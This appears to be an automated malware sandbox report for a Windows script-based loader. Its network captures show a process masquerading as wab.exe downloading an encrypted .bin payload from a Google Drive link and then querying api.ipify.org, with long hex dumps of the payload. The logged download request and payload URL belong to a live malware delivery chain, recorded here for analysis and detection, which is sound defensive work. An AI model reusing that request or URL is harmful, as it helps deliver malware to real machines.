                                                            2024-04-18 19:17:17 UTC1255INData Raw: 6d 41 59 30 75 31 31 4d 41 6f 6e 2f 51 38 4a 35 41 39 46 6b 71 42 49 39 43 46 6d 56 32 57 73 4a 4f 4d 33 73 6a 63 41 6a 6a 67 5a 79 79 57 38 4f 4d 5a 4c 54 57 37 49 46 63 79 73 4e 30 33 45 69 42 74 37 33 4e 67 31 51 30 56 59 38 6d 61 59 4f 31 51 49 77 68 47 59 4e 44 49 6e 6a 78 51 6c 74 2f 39 46 34 73 7a 69 37 44 34 6e 37 4b 4d 46 76 57 4e 46 49 65 69 44 56 4c 6f 45 44 74 48 65 7a 35 59 7a 47 36 7a 61 61 41 4d 71 31 34 4a 7a 69 4f 52 6e 58 43 42 47 63 62 59 4d 63 49 33 43 6a 70 43 45 36 69 36 6b 63 69 65 56 54 5a 65 6c 75 38 71 37 64 74 78 39 6a 31 44 43 49 70 37 58 36 77 78 73 4c 35 33 50 51 48 6e 75 41 5a 31 38 63 69 57 58 56 56 45 4f 4a 4a 4f 73 54 74 6b 39 42 41 4f 71 63 34 49 7a 78 72 32 38 44 74 30 37 44 59 6d 6a 56 44 58 75 4d 6e 30 52 65 37 7a 51
                                                            Data Ascii: mAY0u11MAon/Q8J5A9FkqBI9CFmV2WsJOM3sjcAjjgZyyW8OMZLTW7IFcysN03EiBt73Ng1Q0VY8maYO1QIwhGYNDInjxQlt/9F4szi7D4n7KMFvWNFIeiDVLoEDtHez5YzG6zaaAMq14JziORnXCBGcbYMcI3CjpCE6i6kcieVTZelu8q7dtx9j1DCIp7X6wxsL53PQHnuAZ18ciWXVVEOJJOsTtk9BAOqc4Izxr28Dt07DYmjVDXuMn0Re7zQ
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 48 62 31 43 67 30 55 68 71 4c 63 4e 2f 69 66 75 2f 2b 75 78 39 30 58 67 54 47 79 62 72 69 63 73 6a 48 34 6c 39 42 68 61 42 37 31 6d 63 6c 57 39 70 53 48 51 4f 62 68 36 46 4e 31 79 4c 6d 58 77 34 75 42 58 41 6a 72 7a 41 31 55 77 4f 37 31 66 51 63 38 39 54 30 58 76 32 5a 49 47 78 78 4f 4b 31 53 35 39 45 4f 67 41 6c 69 4a 48 73 73 79 75 74 43 38 6d 43 5a 5a 34 35 57 75 74 4b 4d 4d 49 63 43 2f 76 62 63 4a 35 70 69 4b 50 63 41 57 58 70 43 2f 73 4a 73 6e 62 63 69 4b 4d 4d 50 55 59 51 41 78 74 43 41 77 64 44 4f 33 38 48 7a 2b 55 33 6b 32 6d 46 4f 71 70 36 31 51 74 47 33 35 41 56 4d 4b 63 6c 4a 2f 6f 5a 6c 51 74 78 6c 49 73 32 78 48 75 77 6a 47 79 69 79 39 47 63 38 4d 46 61 72 53 53 4e 70 6b 4a 55 76 6a 62 62 78 49 76 6a 44 4c 6b 67 31 58 6a 32 69 66 67 72 57 4b
                                                            Data Ascii: Hb1Cg0UhqLcN/ifu/+ux90XgTGybricsjH4l9BhaB71mclW9pSHQObh6FN1yLmXw4uBXAjrzA1UwO71fQc89T0Xv2ZIGxxOK1S59EOgAliJHssyutC8mCZZ45WutKMMIcC/vbcJ5piKPcAWXpC/sJsnbciKMMPUYQAxtCAwdDO38Hz+U3k2mFOqp61QtG35AVMKclJ/oZlQtxlIs2xHuwjGyiy9Gc8MFarSSNpkJUvjbbxIvjDLkg1Xj2ifgrWK
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 51 37 73 56 42 79 69 66 2f 77 47 77 55 71 75 61 34 4a 43 56 41 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41 46 73 41 41
                                                            Data Ascii: Q7sVByif/wGwUqua4JCVAAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.84971464.233.185.1024436928C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-18 19:17:55 UTC216OUTGET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            2024-04-18 19:17:55 UTC1582INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Thu, 18 Apr 2024 19:17:55 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-424ce4fAwxhwD8OY4RBLIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.84971664.233.185.1324436928C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-18 19:17:56 UTC258OUTGET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-18 19:17:56 UTC4760INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Content-Security-Policy: sandbox
                                                            Content-Security-Policy: default-src 'none'
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            X-Content-Security-Policy: sandbox
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Resource-Policy: same-site
                                                            X-Content-Type-Options: nosniff
                                                            Content-Disposition: attachment; filename="qVucYbfjkMUhBtz44.bin"
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: false
                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                            Accept-Ranges: bytes
                                                            Content-Length: 243264
                                                            Last-Modified: Thu, 18 Apr 2024 08:59:37 GMT
                                                            X-GUploader-UploadID: ABPtcProUoYRzFIhy4ocXqi6mlIWuMvV8bRMYVt9e2lycM2z0RfnmVhPGWhktW9DXLoJnJ97BPndGlKAzw
                                                            Date: Thu, 18 Apr 2024 19:17:56 GMT
                                                            Expires: Thu, 18 Apr 2024 19:17:56 GMT
                                                            Cache-Control: private, max-age=0
                                                            X-Goog-Hash: crc32c=h5QOdg==
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-04-18 19:17:56 UTC4760INData Raw: 55 52 0d b0 c8 80 33 ea 90 7a 83 70 22 0e 43 f3 ff 7c 2d 16 ac 43 9e fd c8 4a b4 1c 39 cc 09 d4 73 b0 93 76 66 1d 48 bc de 60 bd d9 4c 10 b1 95 3c 61 87 d1 8e 09 b0 9e b3 f9 b6 5b 89 28 99 05 00 48 a8 4f fd 6f f7 cb 60 b8 bf 2a 21 9c c9 ad 6c 08 05 e8 6f 0c 0e 20 ec d1 d7 45 3d c4 80 1d dc 48 d0 d8 07 7d 8f 03 3c e6 2d 20 d4 77 3a dd ca 70 98 85 14 75 85 83 8c 8f 62 fc 98 44 64 b3 e6 dd 4f b4 03 ba 34 1d b1 b8 24 0a 40 9a 81 85 f2 a0 11 50 24 c6 1b 78 7c 6a 72 29 56 03 42 56 d4 83 ed ca 65 92 92 d4 b1 27 cf 73 c3 0b 5f 0a a0 c4 da b7 a9 5f b1 e8 07 56 fe 2e fa 9c 17 29 10 af 76 c9 a3 83 de 95 67 cf fa 18 b7 b0 d9 e6 32 cd ca 70 73 6c 44 68 53 7a 78 75 f6 fb a0 88 bd ac d3 f4 e8 24 96 a7 49 cd 28 a5 57 11 a3 d8 f4 3b b5 75 ec 6a c4 cf b6 26 6e 69 14 86 5c
                                                            Data Ascii: UR3zp"C|-CJ9svfH`L<a[(HOo`*!lo E=H}<- w:pubDdO4$@P$x|jr)VBVe's__V.)vg2pslDhSzxu$I(W;uj&ni\
                                                            2024-04-18 19:17:56 UTC4760INData Raw: 66 42 d2 03 fa d7 d2 5e 39 53 e9 48 ca 7b fb 84 f2 f6 00 9d 42 2b e6 99 a5 23 ea 57 ab f4 03 63 10 2f 7d 71 0e 22 4d ec ac eb 0a 6b 82 35 90 85 b5 d6 f2 5c b2 ac 0e 38 0a a8 18 d0 78 80 c6 89 d4 f6 78 2b de e2 da 67 8e 15 7d ab 04 61 1a b6 e4 52 ad 03 70 c2 7e 4e 78 48 7f 07 8c 02 be d1 a6 31 62 a4 48 0c 44 b2 6b 1f 28 0f 54 50 38 90 04 ca ad 1b 03 9c de d4 cc 80 fe ed a9 73 05 d0 80 f3 bb ec df f1 0b 24 f2 b5 e0 0f 49 ac 19 44 42 f8 64 95 90 77 3a ed 68 23 e7 26 ab c4 3e b7 c1 f5 33 6a be 24 f9 81 91 06 92 ed b7 12 f1 45 05 16 35 f2 cb b3 ed 50 b0 16 cc fd 87 51 9d 9d ea 0a bc 72 3a c2 be f6 a6 70 20 48 fc 5c 08 26 e2 7e 9a 9c 5d 8b 06 ef 3d 64 68 0e 80 90 36 d7 55 18 89 38 06 b4 d6 85 f9 bf 83 d9 1e 59 ce 6d 14 c3 b2 05 86 47 38 5a f1 6e c8 de df c6 f6
                                                            Data Ascii: fB^9SH{B+#Wc/}q"Mk5\8xx+g}aRp~NxH1bHDk(TP8s$IDBdw:h#&>3j$E5PQr:p H\&~]=dh6U8YmG8Zn
                                                            2024-04-18 19:17:56 UTC426INData Raw: f7 c9 d6 31 69 e2 5f b8 7c 3b 72 c9 52 ae 55 83 3c 45 66 32 05 15 60 9d f6 37 91 b4 7b d7 f1 0b 84 a1 bc a1 43 cb 02 03 26 7d 3a b2 37 de 7b ae d8 87 1f a6 9b 03 c2 ce 1a 19 7d 33 2f cc 1f 06 7e b6 13 be a3 6d 1d 38 4f fe 91 f9 c7 64 b8 41 26 d2 63 e9 a0 d4 08 05 16 6e 35 00 20 ac d1 ef f7 3e c4 80 3d d2 48 d0 d8 f9 73 83 03 3c 18 21 2c d4 57 2c dd ca 70 66 84 2d 55 85 83 8c 71 6e f8 18 94 20 b3 e8 c3 dd 87 03 0e 37 f8 ae 00 25 4c 73 b5 d5 ed bb c4 31 20 56 57 72 06 1d 07 ac 46 3b 6d 0c 24 a0 a3 8f 51 44 d9 d5 ba 91 4e 89 13 87 44 06 d4 c1 ac be bd c6 52 bc e8 03 57 fe 2e fa 11 51 29 40 eb 88 c7 e4 82 23 99 43 8d 91 3c b7 b0 d3 18 3c cd ca 50 8d 6c 46 69 a6 75 7f 75 f6 a9 af 84 bd 84 d6 f4 e8 24 68 a6 ae 10 2b a5 57 cf af db f4 f3 f5 75 ec 60 7a c1 bc 06
                                                            Data Ascii: 1i_|;rRU<Ef2`7{C&}:7{}3/~m8OdA&cn5 >=Hs<!,W,pf-Uqn 7%Ls1 VWrF;m$QDNDRW.Q)@#C<<PlFiuu$h+Wu`z
                                                            2024-04-18 19:17:56 UTC1255INData Raw: 9f 09 67 53 fd 86 52 81 e5 34 0e ec 60 33 85 f9 cc e2 bb d0 04 ce c2 e1 32 69 9b a2 19 60 fb 33 6c bf 0a f9 46 67 5d a0 43 55 23 bb db ee ca 37 e9 84 d3 5b 01 4a 77 a8 0a a9 33 87 32 90 b6 53 83 81 a3 86 e9 8e 7a 17 a4 03 d7 69 74 c0 1d b0 78 c9 98 ca fb 01 92 10 15 41 3c 54 ff af b3 29 a2 0d 3e ee 7c 04 b3 bf e0 d5 cc 06 e9 2f 4f fc a1 15 eb 00 06 22 73 ba 38 ee 21 32 15 47 24 48 4e 85 85 b7 f6 2d 8e 19 96 fd 9a 23 91 81 f7 31 52 c6 b4 03 2e 8c 8c 7d 33 6c e6 32 59 28 6a 66 3a c2 67 65 1d 7d a1 ee d5 1c 45 fe 17 e6 4d d5 47 c1 57 dd 52 f0 69 7b 7b cd ea d2 e3 93 14 3a f0 b4 a1 f2 68 1c 48 96 33 a0 47 c6 e8 1c 3b 40 84 40 cd 92 6c 8c ff a4 24 48 88 e5 45 25 d5 8a db 0c 70 3e 23 39 03 38 52 63 87 37 cb 99 19 d9 80 60 f7 17 d4 94 ea 81 8c e1 ee d8 a8 dd 94
                                                            Data Ascii: gSR4`32i`3lFg]CU#7[Jw32SzitxA<T)>|/O"s8!2G$HN-#1R.}3l2Y(jf:ge}EMGWRi{{:hH3G;@@l$HE%p>#98Rc7`
                                                            2024-04-18 19:17:56 UTC1255INData Raw: b8 45 ca d3 04 c4 18 c1 41 92 29 7b 3a 64 c3 05 1c ae f8 e3 9f f7 94 39 88 98 e2 09 71 3d ac 65 f0 6b 3f 99 40 ae 52 62 c8 4c 15 71 e1 55 2e 26 17 8c c8 a2 cc 25 0f ec 57 8d bc ec a9 d1 3e 38 62 3f ca 54 ec 75 87 81 c5 ee 8f ae e9 c0 d2 b6 3f 65 f5 58 30 c6 d5 74 7e f2 79 1f ae d2 9d b5 ce 6f a3 7f 9d 34 d2 72 f0 23 c9 c2 9c df 09 31 17 ec f4 91 39 ac 69 0f 72 83 50 c9 97 cf e2 6f 65 4c 39 08 15 7a 17 5b 6b 75 53 e5 54 0b 3d b2 f1 f8 f9 28 64 ed b0 d2 1a 44 b5 f9 96 6b 9f 92 4f 2e 78 d0 cd 9c ec 83 54 6f 59 62 b5 35 74 7d d0 1a 58 8f 7a 9f 51 3d 88 d2 40 81 ab a5 27 44 e1 ae 9c 16 a1 de 92 c6 c5 ce 3a 56 2c 73 77 93 d7 72 89 df 65 e5 4d 8f 50 80 81 a6 20 f7 fb cf 09 c4 28 3d 45 d2 8f b0 7a 1d 8d ed 6f ae ab 87 15 7b bb 3c 0f eb 6e bb 08 1b 88 b4 85 d9 0e
                                                            Data Ascii: EA){:d9q=ek?@RbLqU.&%W>8b?Tu?eX0t~yo4r#19irPoeL9z[kuST=(dDkO.xToYb5t}XzQ=@'D:V,swreMP (=Ezo{<n
                                                            2024-04-18 19:17:56 UTC1255INData Raw: 6d 5e 70 b7 15 ad 8d 03 8e ce 7e 64 43 73 7d 07 ff fe bf e8 b9 31 62 b5 16 0f 44 b2 6f 8e 7b 08 54 6e 43 9e 04 ca ad 1b 01 9b de f4 33 8c fe ed 77 70 3c c7 80 0d ba a7 3b f5 0b 54 a9 ec e0 0f 45 72 14 44 42 d8 98 9b 90 77 c4 1d 63 23 e7 f8 a7 c3 3e 97 3d f4 0a 60 40 25 c0 70 b0 07 92 13 bb ec ff 2a 53 16 cb f4 35 bd cc 5c 4e 1a cd 03 e9 3f 98 9d e0 f4 8a 72 3a fa 0c ce f4 8e 21 bb d3 5c 67 7e f1 4e 96 62 00 88 06 11 33 66 68 6d 90 95 36 a7 3a bf 87 3c 0c e3 c0 84 f9 b5 ec 7d 12 5d c4 3f 5d c6 b2 75 50 1d 01 4b fb 57 ef 20 d3 c7 08 6c 6a c1 fc cc 44 fc a2 45 58 2e 11 6e de 85 7f 5b 54 cf 4c 22 51 5b a2 64 0b 2a 1c da 4b df 50 37 d4 4f eb 72 07 10 d0 2d c1 d8 d8 6e fd c2 81 d5 1e ac c7 f7 d5 fe 53 bf 63 f3 6b e7 3e f5 7e b7 92 f7 e2 d7 c6 04 47 aa a2 0b e0
                                                            Data Ascii: m^p~dCs}1bDo{TnC3wp<;TErDBwc#>=`@%p*S5\N?r:!\g~Nb3fhm6:<}]?]uPKW ljDEX.n[TL"Q[d*KP7Or-nSck>~G
                                                            2024-04-18 19:17:56 UTC1255INData Raw: 22 5b 6b 64 2a ef 1a 78 b2 1e 8a e0 4f d7 79 9e 06 02 3b c9 31 5d 83 ec 47 80 91 db 6b e1 e3 d0 75 e6 58 ca 2e 47 d4 b7 a9 8c fa c3 94 60 29 61 ad f3 8a ac 8f 18 38 02 12 4c 22 85 d9 cc 1c ba e9 e1 cf fb eb cc 65 9f a2 11 56 fb 33 66 cd 45 fa 46 66 5d a2 40 55 23 ae db ee ca 37 e6 b1 d6 5b ff 46 43 ad 2a 88 33 bf c4 90 48 95 bf 81 a3 86 04 b2 70 17 d2 44 d7 69 70 3e 13 a1 58 e9 ba ca fb ff 62 1d 19 79 39 ab f3 a3 b3 f7 8e 0e 3e ce 81 05 8a a9 1e d4 f5 e7 e5 27 4f 71 ea 14 eb f4 f1 2d 7a 92 17 cf 21 38 61 ad 2a 44 4c 7b 75 b9 fa 0d aa 18 96 fd 64 d3 93 b8 d7 cf 5e c5 4a 2a 2f 8c 5c 70 cd 6d dd 0c 64 28 6a 92 1b fc 67 1e 73 83 af eb 2b 32 47 fe 37 e4 b3 db 4b 3f 59 20 5e fc 97 57 62 cd ca d0 1d 92 2d e1 f1 8d b0 0c 64 18 b6 4a 39 a0 b9 ca c1 21 1b 43 8e 68
                                                            Data Ascii: "[kd*xOy;1]GkuX.G`)a8L"eV3fEFf]@U#7[FC*3HpDip>Xby9>'Oq-z!8a*DL{ud^J*/\pmd(jgs+2G7K?Y ^Wb-dJ9!Ch
                                                            2024-04-18 19:17:56 UTC1255INData Raw: ea 14 0e e4 4c 46 9c c6 5e 3b ff 13 34 bf e3 07 1f 36 78 57 c3 d2 7e cc 71 7b 79 1e 7f 99 0f d6 d7 ec 9a 94 7f d6 db 6d 72 14 27 7e fd 98 5b fa d6 04 2a 18 f8 58 82 29 7b 03 69 c3 05 1a 97 32 12 63 08 8c 4b 88 98 e2 23 af 37 af 65 d0 94 31 99 40 50 ad 57 da 4c 35 71 c1 55 2e d8 16 4b cc a2 cc 05 0d cc 56 8d 42 e2 54 df 3e c6 6e c2 c6 74 ee 55 80 81 3b ef 48 a1 d0 c5 d2 8e 85 5d f0 58 10 c5 ed aa 80 f3 88 3c ae d2 63 b9 e7 6f 83 64 ad 36 d2 17 f1 1a c3 ca 9c df 18 31 16 ec f4 91 39 ac 68 0f 4a 29 5c ca 97 ef 1f 63 67 4c e7 08 2c 7f 17 a5 6a 74 44 e5 54 0b 25 3a 0e 07 06 fe 27 ed b0 f8 77 27 b5 f9 62 0a f9 92 4f da 8a dc cc bc 12 8f 55 6f 8f 5d 8c 3f 72 83 de 18 78 70 73 9f 51 e3 8b d0 40 81 ab a0 25 44 ba c9 9c 16 a5 de 9f fd c0 ee 3a 56 14 76 5f a8 d7 4a
                                                            Data Ascii: LF^;46xW~q{ymr'~[*X){i2cK#7e1@PWL5qU.KVBT>ntU;H]X<cod619hJ)\cgL,jtDT%:'w'bOUo]?rxpsQ@%D:Vv_J
                                                            2024-04-18 19:17:56 UTC1255INData Raw: 9c e9 50 54 71 0e 26 76 d7 ae eb ea 95 8c 35 81 85 4b cb d2 5c 92 ab 0e c6 04 54 19 d1 ea 80 c6 89 a7 59 74 29 d8 42 da 67 8e 11 a3 a2 3d 73 1a 48 ea 72 ad 03 8e ce 80 40 58 43 5f 04 8c fc bf 16 bb 33 62 a4 c8 03 46 b2 4f 71 75 0f 54 a8 19 a5 18 ca ad e5 f3 95 de d4 49 f8 fe ed 8d 59 6b d0 80 07 80 5f d1 f1 0b 04 d8 b9 e0 0f b1 82 18 44 42 06 96 99 90 57 3a 13 64 23 19 07 92 ce 3e b7 3f f4 2a 61 be 24 f9 7f bf 05 92 ed 49 e0 fd 45 25 15 cb fe cb 4d cc 65 b5 16 cc 03 be 6d 98 9d ea 32 fe 88 c5 3d 40 c7 f4 8e a4 c2 d6 5c 0c 03 0f 40 9d 9c f0 87 06 ef 17 0b 68 1f aa 6e 3f d7 55 9d f3 3c 06 88 c1 82 f9 bf 85 d9 1b 5d ce 3f 2c c1 b2 75 05 32 01 4b f5 b3 db 20 d3 c7 08 6c 68 c1 b7 b3 41 fc d2 d4 0d 2f 11 4c c1 ac 7f 51 82 8a 11 32 51 51 d2 e6 9a 2a 54 79 1a cc
                                                            Data Ascii: PTq&v5K\TYt)Bg=sHr@XC_3bFOquTIYk_DBW:d#>?*a$IE%Mem2=@\@hn?U<]?,u2K lhA/LQ2QQ*Ty
                                                            2024-04-18 19:17:56 UTC1255INData Raw: 77 6f 01 9b 33 89 06 76 a5 3c ba 13 e2 23 18 29 ab 5b 63 e2 3b 0c dc 83 ae c4 33 eb d1 72 5c 3e 17 45 34 26 8b d5 fe 3f 4b d7 78 56 dd 2e a5 6a a3 2e ee 1a 58 9b 3e 92 e0 b1 d9 84 90 06 fc 37 34 3d 7d 86 cc 68 80 6f da ac f6 da da 75 18 54 e0 0e 89 d8 b6 a9 32 25 3c 6b 9f f7 6b ad f3 aa 07 81 1b 38 fc ed 79 03 85 f9 cc e2 b3 e9 1f eb b9 95 cc 65 9b d0 5b 51 fb 43 4e 2f 4b f9 4c 1b d7 ae 43 51 23 fe db ee ca 37 e9 88 d3 5b 01 4a 7b a8 0a dc 33 87 32 90 b6 53 82 81 a3 86 e9 8b 72 17 eb 3d d7 69 7e 7e 86 bc 78 e9 9a 9f fb 01 6c e0 17 41 3c aa 0d af b3 09 a2 02 3e ee 82 fb 8b 90 f7 d5 cc f8 1b 2e 4e 8f c6 0e eb 0a f8 6c 93 b6 18 cf 01 22 15 b9 2a ba 40 85 7b bb 04 21 ae 18 b6 90 9a dd 90 46 d6 08 58 c6 4a 0a 04 ac 32 70 33 6c 1a 14 64 28 6a 92 1e fc 67 45 41
                                                            Data Ascii: wo3v<#)[c;3r\>E4&?KxV.j.X>74=}houT2%<kk8ye[QCN/KLCQ#7[J{32Sr=i~~xlA<>.Nl"*@{!FXJ2p3ld(jgEA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849717172.67.74.1524436928C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-18 19:18:00 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2024-04-18 19:18:01 UTC211INHTTP/1.1 200 OK
                                                            Date: Thu, 18 Apr 2024 19:18:01 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 8766ff903a691377-ATL
                                                            2024-04-18 19:18:01 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                            Data Ascii: 81.181.57.52


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:1
                                                            Start time:21:16:59
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
